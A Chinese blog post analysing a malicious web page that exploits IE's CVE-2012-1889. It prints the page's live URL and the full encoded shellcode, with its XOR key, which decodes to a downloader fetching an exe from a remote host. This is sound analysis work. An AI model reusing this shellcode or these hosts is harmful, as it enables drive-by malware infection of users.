简单分析了网马样本
格式有点乱,利用的漏洞也没那么新,大家随便看看吧,欢迎交流~
一、漏洞信息收集
来源
http://a.prir.asia:82/sklh.html
Response contentSHA-256
0fde420792f009477206c0914d1275c0562706e431dcac4b57354ca630a0df47
从代码中的classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" 我们可以在网上搜索到
相关信息为
漏洞标题: IE暴雷0day漏洞(CVE-2012-1889)XML组件未名内存破坏漏洞
漏洞类型:远程代码执行
公开时间为: 2012-06-18
漏洞形式:使用DOM操作IMG节点的SRC设置nameProp属性填充调用栈,控制eax!
也就是eax的值来源于栈中,栈上的值未经初始化,被直接用作对象指针后就会出现问题,要稳定利用此漏洞就需要对eax的值进行控制,只要预先在栈上排布上我们的数据就可以实现该功能
http://www.wooyun.org/bugs/wooyun-2012-08435
http://www.freebuf.com/articles/4230.html
二.分析过程
1. 首先查看样本内容,收集样本信息
可以通过工具或者手工查看该链接查看源代码
通过对源代码的浏览可以看出该样本是利用某种漏洞的EXP代码,根据代码中的
classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4"
可以查找出漏洞利用的信息,在上一节已经对信息进行了介绍
2. 具体的EXP分析过程
从代码中我们可以在head中看到一段相对比较清晰的exploit,进而进行分析
在head中的这个JS脚本中,就是对shellcode进行构造以及堆溢出点构造的过程,
其中的shellcode部分,是变量替换的形式构造,所以我们需要拿到完成的shellcode并进行解密
手工的构造过程也就是变量拼接,通过构造出的脚本如下:
正常情况下,手工构造出上述情况,然后就可以弹出shellcode部分解密后的结果,但是执行后,发现无法正常直接解密,这种情况就有可能是不能直接解密,可能对其需要XOR处理,
test=scwapx1+scwapx98+scytxtv+scwapx88
alert(test)
三.Shellcode的解密过程
所以我们利用上面两句替换上述脚本的最后两句,拿到shellcode的unicode编码形式,然后再进行手工解密,拿到unicode为:
%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%u93dc%u8e8f%uc58d%ud393%uc9d8%u8487%uce92%ud1d6%u92d5%ud6ce%ud5d1%ud893%ud8c5%ubdbd%ubdbd%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA
我们已经分析过,直接解密是无法解开的
所以我们要对其进行XOR值得查找,这比较需要经验和尝试,在上述unicode转化为十六进制格式后,我们可以看到:
\x58\x58\x58\x58\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\xB8\x03\x80\x34\x0B\xBD\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x54\xA3\xBE\xBD\xBD\xE2\xD9\x1C\x8D\xBD\xBD\xBD\x36\xFD\xB1\x36\xCD\xA1\x10\x36\xD5\xB5\x36\x4A\xD7\xAC\xE4\x55\x03\xBF\xBD\xBD\x2D\x5F\x45\xD5\x8E\x8F\xBD\xBD\xD5\xE8\xCE\xD8\xCF\xE9\x36\xFB\xB1\x55\x03\xBC\xBD\xBD\x36\x55\xD7\xB8\xE4\x55\x23\xBF\xBD\xBD\x5F\x44\xD5\xD2\xD3\xBD\xBD\xD5\xC8\xCF\xD1\xD0\xE9\x42\xAB\x38\x7D\xC8\xAE\xD5\xD2\xD3\xBD\xBD\xD5\xC8\xCF\xD1\xD0\xE9\x36\xFB\xB1\x55\x33\xBC\xBD\xBD\x36\x55\xD7\xBC\xE4\x55\xD3\xBF\xBD\xBD\x5F\x44\xD5\xD1\x8E\x8F\xBD\xD5\xCE\xD5\xD8\xD1\xE9\x36\xFB\xB1\x55\xD2\xBC\xBD\xBD\x36\x55\xD7\xBC\xE4\x55\xF2\xBF\xBD\xBD\x5F\x44\x3C\x51\xBD\xBC\xBD\xBD\x36\x61\x3C\x7E\x3D\xBD\xBD\xBD\xD7\xBD\xD7\xA7\xEE\xD7\xBD\x42\xEB\xE1\x8E\x7D\xFD\x3D\x81\xBE\xBD\xC8\x44\x7A\xB9\xBE\xE1\xfa\x93\xD8\x7A\xF9\xBE\xB9\xC5\xD8\xBD\xBD\x8E\x74\xEC\xEC\xEE\xEA\xEC\x8E\x7D\x36\xFB\xE5\x55\x9F\xBC\xBD\xBD\x3E\x45\xBD\x54\x1E\xBD\xBD\xBD\x2D\xD7\xBD\xD7\xBD\xD7\xBE\xD7\xBD\xD7\xBF\xD5\xBD\xBD\xBD\x7D\xEE\x36\xFB\x99\x55\xBC\xBC\xBD\xBD\x34\xFB\xDD\xD7\xBD\xED\x42\xEB\x95\x34\xFB\xD9\x36\xFB\xDD\xD7\xBD\xD7\xBD\xD7\xBD\xD7\xB9\xD7\xBD\xED\x42\xEB\x91\xD7\xBD\xD7\xBD\xD7\xBD\xD5\xA2\xBD\xB2\xBD\xED\x42\xEB\x81\x34\xFB\xC5\x36\xF3\xD9\x3D\xC1\xB5\x42\x09\xC9\xB1\x3D\xC1\xB5\x42\xBD\xC9\xB8\x3D\xC9\xB5\x42\x09\x5F\x56\x34\x3B\x3D\xBD\xBD\xBD\x7A\xFB\xCD\xBD\xBD\xBD\xBD\x7A\xFB\xC9\xBD\xBD\xBD\xBD\xD7\xBD\xD7\xBD\xD7\xBD\x36\xFB\xDD\xED\x42\xEB\x85\x36\x3B\x3D\xBD\xBD\xBD\xD7\xBD\x30\xF3\xC9\xEC\x42\xCB\xCD\xED\x42\xCB\xDD\x42\xEB\x8D\x42\xCB\xDD\x42\xEB\x89\x42\xCB\xC5\x42\xEB\xFD\x36\x46\x8E\x7D\x8E\x66\x3C\x51\xBD\xBF\xBD\xBD\x36\x71\x3E\x45\xE9\xC0\xB5\x34\xA1\xBC\x3E\x7D\xB9\x56\x4E\x36\x71\x36\x64\x3E\x7E\xAD\x8E\x7D\xED\xEC\xEE\xED\xED\xED\xED\xED\xED\xEA\xED\xED\x42\xEB\xB5\x36\xC3\xE9\x55\xAD\xBC\xBD\xBD\x55\xD8\xBD\xBD\xBD\xD5\xDE\xCB\xCA\xBD\xD5\xCE\xD5\xD9\xD2\xE9\x36\xFB\xB1\x55\x99\xBD\xBD\xBD\x34\xFB\x81\xD9\x1C\xB9\xBD\xBD\xBD\x30\x1D\xDD\x42\x42\x42\xD7\xD8\x42\xCB\x81\x36\xFB\xAD\x55\xB5\xBD\xBD\xBD\x8E\x66\xEE\xEE\xEE\xEE\x42\x6D\x3D\x85\x55\x3D\x85\x54\xC8\xAC\x3C\xC5\xB8\x2D\x2D\x2D\x2D\xC9\xB5\x36\x42\xE8\x36\x51\x30\xFD\xB8\x42\x5D\x55\x1B\xBD\xBD\xBD\x7E\x55\x1D\xBD\xBD\xBD\x05\xAC\xBC\xB9\x3D\x7F\xB1\xBD\x55\x2E\xBD\xBD\xBD\x3C\x51\xBD\xBC\xBD\xBD\x36\x41\x3E\x7A\xB9\x7A\xBA\x8F\xC9\x2C\xB1\x7A\xFA\xB9\xDE\x34\x6C\xF2\x7A\xFA\xB5\x1D\xD8\x2A\x76\x7A\xFA\xB1\xEC\xFD\x07\xC2\x7A\xFA\xAD\x83\xA0\x0B\x84\x7A\xFA\xA9\x05\xD4\x69\xA6\x7A\xFA\xA5\x03\xC2\xDB\x1D\x7A\xFA\xA1\x41\x14\x8A\x10\x7A\xFA\x9D\x25\xB7\xAD\x45\xD9\x1C\x8D\xBD\xBD\xBD\x36\xFD\xB1\x36\xCD\xA1\x10\x36\xD5\xB5\x36\x4A\xD7\xB9\xE4\x55\xE9\xBD\xBD\xBD\x2D\x5F\x45\xD5\x8E\x8F\xBD\xBD\xD5\xE8\xCE\xD8\xCF\xE9\x36\xBB\x55\xE8\x42\x42\x42\x36\x55\xD7\xB8\xE4\x55\x88\xBD\xBD\xBD\x5F\x44\x8E\x42\xEA\x42\xEB\xB9\x56\xBF\xE5\x7E\x55\x44\x42\x42\x42\xE6\x7B\xBA\x05\x34\xE2\xBC\xDB\x7A\xFA\xB8\x42\x5D\x7E\xEE\x36\x61\xEE\xD7\xFD\xD5\xBD\xAD\xBD\xBD\xEA\x36\xFB\x9D\x55\xA5\x42\x42\x42\xE5\x7E\xEC\xEB\x36\xC8\x81\x36\xC9\x93\xC5\xBE\x48\xEB\x36\xCB\x9D\xBE\x48\x8E\x74\xF4\xFC\x10\xBE\x78\x8E\x66\xB2\x03\xAD\x87\x6B\xC9\xB5\x7C\x76\xBA\xBE\x67\xFD\x56\x4C\x86\xA2\xC8\x5A\xE3\x36\xE3\x99\xBE\x60\xDB\x36\xB1\xF6\x36\xE3\xA1\xBE\x60\x36\xB9\x36\xBE\x78\x16\xE3\xE4\x7E\x55\x60\x41\x42\x42\x0F\x4F\x5F\x49\x84\x5F\xC0\x3E\x67\xF5\xC6\x80\x8F\xC9\x2C\xB1\x38\x62\x12\x06\xDE\x34\x6C\xF2\xEC\xFD\x07\xC2\x1D\xD8\x2A\x76\xA3\x19\xD9\x52\x2E\x8F\x59\x29\x33\xAE\xB7\x11\x7F\xA4\xF6\xBC\x79\x30\xA2\xC9\xEA\xDB\xB0\x42\xFE\x03\x11\x66\xC0\x4D\x18\x27\xEF\x43\x1A\x67\x83\xA0\x0B\x84\x05\xD4\x69\xA6\x03\xC2\xDB\x1D\x41\x14\x8A\x10\x25\xB7\xAD\x45\x3D\x6B\x12\x27\x46\xEE\xA8\xdb\xd5\xc9\xc9\xcd\x87\x92\x92\xdc\x93\x8f\x8e\x8d\xc5\x93\xd3\xd8\xc9\x87\x84\x92\xce\xd6\xd1\xd5\x92\xce\xd6\xd1\xd5\x93\xd8\xc5\xd8\xbd\xbd\xbd\xbd\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xBD\xEA\xEA
查找XOR值得经验一般就是从这段十六进制代码中,尝试使用经常出现的字符,这里找到了\xBD
这样就对这段shellcode部分进行了解密,结果是里边有一个下载exe文件的链接,我们尝试下载,竟然还可以下载,下载后将其用vt扫描
四.其他部分
在样本源页面中的最后,还嵌入了一句JS脚本链接
脚本中的内容大概是进行构造IMG样式,执行一段引入IMG的脚本,
通过上述的分析,我们即完成了一个恶意网页样本的分析